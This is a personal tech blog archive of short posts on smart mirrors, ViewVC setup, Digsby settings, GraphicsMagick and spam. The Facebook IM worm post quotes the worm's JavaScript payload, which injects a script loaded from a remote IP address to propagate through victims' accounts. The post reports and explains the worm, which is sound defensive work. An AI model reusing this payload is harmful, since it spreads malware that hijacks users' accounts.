failure of imagination

Mirror, mirror: The New York Times wants to serve you info as you’re brushing your teeth

It’s another smart house scheme that lives in your bathroom mirror and tracks your prescriptions by RFID. I got almost this exact pitch when I toured Microsoft Research’s demo smart house as a Microsoft intern in 2008. So what’s new? It’s an ad platform:

And it’s also a retail opportunity. So, say, based on my use of this product, that a local retailer wants to promote something to me.

“Mirror: show coupon.”
“Mirror: show coupon.”

I can call up a coupon here, and then save it to my phone, and then go to a physical location to redeem it. So, again, it’s a conversation that happens in front of the mirror, but then it can drive behavior elsewhere, out in the world.

Hey. Creative Technologist for R&D Brian House. This is 2011. In the event that I do purchase a magic mirror that shows me ads, and I see something I like, I’m not gonna bother asking it for a coupon, OBEXing or mailing or whatevering it to my phone, and then going to some brick and mortar store with it. Technology is supposed to save time! I’m gonna order the thing from Amazon and get it in the mail.

 

Clipboard spam

Talking to friends in IRC just now, someone pasted content from the SF Gate which had a Read More link attached that wasn’t in the original page. I went to the page and couldn’t replicate that behavior. A little digging revealed that a Tynt script attaches an oncopy event handler that puts that extra crap in, and that the Ghostery Firefox extension was blocking Tynt on my own machine. Thanks, Ghostery!

 

new variant of Facebook April Fool’s IM worm

There’s a new variant of the Facebook April Fool’s worm going around. This one appears as an IM with the text “haha! hilarous http://fb.me/TzCxMrJW”; the page behind the URL shortener is http://apps.facebook.com/bullydown/ (taken down since I started writing this, see screenshot) which appears to be a Facebook video but actually loads some JavaScript using an onclick handler:

javascript:if(window.opener){ window.opener.document.body.appendChild(document.createElement(‘script’)).src=’http://173.231.144.82/fb.js?like_link=http://winterweddingfavor.info/bullypal/&app_link=http://fb.me/TzCxMrJW&embed_link=http://www.ebaumsworld.com/playerbeta.swf?id0=81417366&im_text=haha! hilarous’; window.close(); }else{ document.body.appendChild(document.createElement(‘script’)).src=’http://173.231.144.82/fb.js?like_link=http://winterweddingfavor.info/bullypal/&app_link=http://fb.me/TzCxMrJW&embed_link=http://www.ebaumsworld.com/playerbeta.swf?id0=81417366&im_text=haha! hilarous’; }

Whatever it loads seems to Facebook Like the link http://winterweddingfavor.info/bullypal/ and then IM your friends. I got three messages in a short span of time. Not sure what’s required to send IMs through Facebook, might be it uses a fake login page to steal credentials like other variants.

 

 

ViewVC on DreamHost, revisited

While getting ready to install MoinMoin on bat-country.us to replace my current static pages, I noticed my ViewVC install was two years out of date. Readers seem to have found my writeup of the last time I installed ViewVC on DreamHost useful, so here’s an update.

DreamHost‘s standard environment now includes Python 2.5.2, virtualenv, and Python bindings for Subversion 1.5. This makes setting up ViewVC a good deal simpler than it used to be. This time around, I’ll be using FastCGI rather than classic CGI as the mechanism for getting Apache to talk to Python. I’d use WSGI, the preferred method of running Python webapps, but WSGI is apparently a little flaky on DreamHost.

Make sure $HOME/bin is in your $PATH environment variable before /usr/bin. My instructions below assume your working directory is $HOME.

Set up a Python virtualenv in your home directory, if you don’t have one already:
$ virtualenv $HOME

ViewVC uses Flup for FastCGI support, and Pygments for syntax highlighting. Install Flup and Pygments into the virtualenv:
$ easy_install Flup
$ easy_install Pygments

Download and unpack the latest stable release of ViewVC (currently 1.1.8):
$ wget http://viewvc.tigris.org/files/documents/3330/48659/viewvc-1.1.8.tar.gz
$ tar -xzf viewvc-1.1.8.tar.gz
$ rm viewvc-1.1.8.tar.gz

Run ViewVC’s installer script:
$ viewvc-1.1.8/viewvc-install --prefix=$HOME/viewvc

Delete the installer directory:
$ rm -rf viewvc-1.1.8

Configure viewvc.conf and the ViewVC templates to suit yourself, as per the ViewVC install instructions and my previous post on ViewVC setup. Remember to set up static content serving with the docroot option in viewvc.conf and the appropriate directory mapping.

Set up an .htaccess file in your domain folder to use Apache’s mod_rewrite for pretty URLs:

RewriteEngine on
RewriteRule ^code/(.*)$ viewvc.fcgi/$1
RewriteRule ^code$ viewvc.fcgi/


Copy viewvc.fcgi, the FastCGI entry point to ViewVC, to your domain folder:
$ cp viewvc/bin/wsgi/viewvc.fcgi example.org/viewvc.fcgi

ViewVC’s installer script will automatically create a viewvc.fcgi that points to the Python interpreter in your virtualenv (the one that has Flup and Pygments installed), so you don’t need to edit the #! line. You will still need to add a line to viewvc.fcgi to set the SCRIPT_NAME environment variable to a URL that matches your .htaccess rewrite rules. Instead of changing os.environ, change environ inside the application function that is the Flup entry point:

def application(environ, start_response):
  environ['SCRIPT_NAME'] = '/code'
  server = sapi.WsgiServer(environ, start_response)
  cfg = viewvc.load_config(CONF_PATHNAME, server)
  viewvc.main(server, cfg)
  return []

And with that, you’re in business. Took me less than half an hour, and that’s counting the time it took to write this.

 

Digsby: useful, once you turn off the ads

Adium is the alpha and omega of chat clients. It does everything right. Unfortunately, it only runs on Macs. I just can’t seem to find a good multiprotocol IM client for Windows.

Way back in the dark ages, when Pidgin was GAIM 1.5 and the UI team hadn’t adopted their “our way or the highway” policy, I used that. But the Gtk+ interface always bugged me and GAIM 2.0 disabled a bunch of UI tweaks that I liked. There was a fork called Carrier or FunPidgin that re-enabled them, but like most annoyance-related forks, there wasn’t a lot of backing and it’s now long dead. So I kicked it to the curb and used Miranda for a while. Unfortunately, maintaining a Miranda install means dealing with at least a dozen plugins to provide features that should have been built in, like grouping a person’s multiple chat handles together (“metacontacts”), the ability to change smileys, a decent chat-history viewer, or a UI that doesn’t look like a throwback to Windows 95. Too much hassle.

Then I heard about Digsby somewhere. It’s not open source. It’s actually kind of unclear what their business model is. However, in terms of feature set, it’s the closest thing to Adium you can get on Windows, with the notable exceptions of OTR encryption and IRC support. It supports metacontacts, it works with Facebook messaging (always surprised by how many people use that), it has a decent message display, and it can be configured to be quite unobtrusive, a major selling point for me. Part of that configuration is turning off all the crap they ship with it. Honestly, I hate ad-supported free stuff, and I hate installers that carry a crapware payload even more. If it’s good, just make it payware. I’ll buy it. If it’s not good, I’m not going to put up with ads because it’s free – there are plenty of other freeware and OSS products out there that are usable.

To the credit of Digsby’s developers, you can turn off the various user-exploitation features! Here’s how.

There’s a constantly varying crapware payload in the Digsby installer: last time I installed Digsby, it was the Ask.com toolbar (link goes to uninstall directions). Real useful. Ask.com’s installer screen has the checkboxes for “Yes, please install this useless piece of data-harvesting crap” pre-checked, so don’t blindly click through.

Once you’ve got Digsby installed, open Digsby’s Preferences window from the systray icon or the Tools menu (shown):

The newest publicly available version of Digsby added ads under every conversation window; that’s what pissed me off enough to go looking for some way to kill them. In the Conversations pane, uncheck the box next to “Support Digsby development by showing an ad in the IM window“.

I want to smack anyone who sends emails ending with “sent from my iPhone” (or BlackBerry, or Hotmail account, or whatever). I prefer my messages unbranded, thanks. Digsby does some similar self-promotion in your AIM profile. In the General & Profile pane, uncheck the box next to “Promote Digsby in my AIM profile“.

And then there’s the most insidious piece: Digsby uses Plura’s platform to appropriate your CPU cycles for commercial purposes. This is one step away from botnet membership, and it uses the same verbiage as legitimate volunteer grid computing like BOINC (the platform that powers SETI@home). In the Research Module pane, uncheck the box next to “Allow Digsby to use CPU time to conduct research“. Maybe some day, commercial grid computing will advance to the point where I can make more money by running it than it costs to power the machines it’s running on, but on that day, the money better be going to me, not whoever landed a parasite program on my computer first.

With this junk disabled, Digsby is a nice little multiprotocol messenger program.

 

GraphicsMagick: doing ImageMagick right

Found out about GraphicsMagick while trying to remember the package name for ImageMagick in Ubuntu 10.10/Maverick‘s repository (I can never remember which package managers do case-insensitive substring matching by default and which don’t). It’s about time someone started making ImageMagick slightly more comprehensible. ImageMagick‘s useful in a pinch, but it’s far from perfect. Its list of command-line flags rivals the Bible in length, it’s sometimes so hard to figure out which options to stick where to do what that on more than one occasion I’ve said “Screw it, I’ll just do this in PIL/SciPy/raw OpenGL!”, and the way it names its various utilities is just rude. convert, identify, display — these are all common words! They get used by everything! Would it have killed them to put a prefix on there? I haven’t even finished installing it, but GraphicsMagick has already solved one of those problems: all of their functionality is accessed through the gm command. Thanks, GraphicsMagick Group! Now, if they suck at compression even slightly less than ImageMagick does, I’ll be a very happy man.

I hope most of the stuff at http://www.imagemagick.org/Usage/ still works on GraphicsMagick. The examples there are a lifesaver if you happen to have a task that matches one of them, but they’re from ImageMagick v6 and GraphicsMagick forked from ImageMagick v5. We’ll see how much translates.

 

hello world, meet gpt-surgeon

gpt-surgeon has a new home on Launchpad! Look for it at https://launchpad.net/gpt-surgeon. Downloads compliant with the Launchpad release scheme (GPG-signed tarball) available here: https://launchpad.net/gpt-surgeon/+download

I’ve decided to go with GPLv2 as the licensing scheme, no copyright assignment required, to keep this simple utility open and available to the public with a minimum of hassle and a maximum of fresh code.

gpt-surgeon will still be available here on Bat Country for a time, but fresh development and new versions will be on the Launchpad site. This version will be frozen as soon as the Launchpad version is available.

 

status update: single

Microsoft and I have parted ways.

Side effect: I will temporarily have more time to post here.

 

preparing to hibernate

This is more or less my non-work technical blog. Problem is, when you do coding for a living, you start to find coding for fun less fun. The major attraction to this blog is gpt_surgeon.py, and I’ll make sure that has a place somewhere so other people can work on it (Launchpad or SourceForge or CodePlex or something), but I don’t use a dual-boot configuration any more and I don’t have the time or the inclination to give gpt_surgeon.py the upgrades it needs. I’ll file a bug report at work with all the information I’ve been given by you, my readers, and hopefully (no promises) the underlying problem will get fixed somewhere down the line. If not, well, I hope someone picks up gpt_surgeon.py.

I plan to do something with my free time that doesn’t involve digging around in system guts for a change.

 

best-targeted spam ever

WHY YES I DO WANT A COPY OF THAT. Sadly, the payload wasn’t even a trojan, just a Chinese-hosted pillz site. The default blocking of images from domains you don’t trust here is good; most clients have it now, and it was clearly developed as a response to web bugs but it also protects one from basilisks. It’s still trivial in the current email protocol to forge a sender, so trust no one – not even yourself.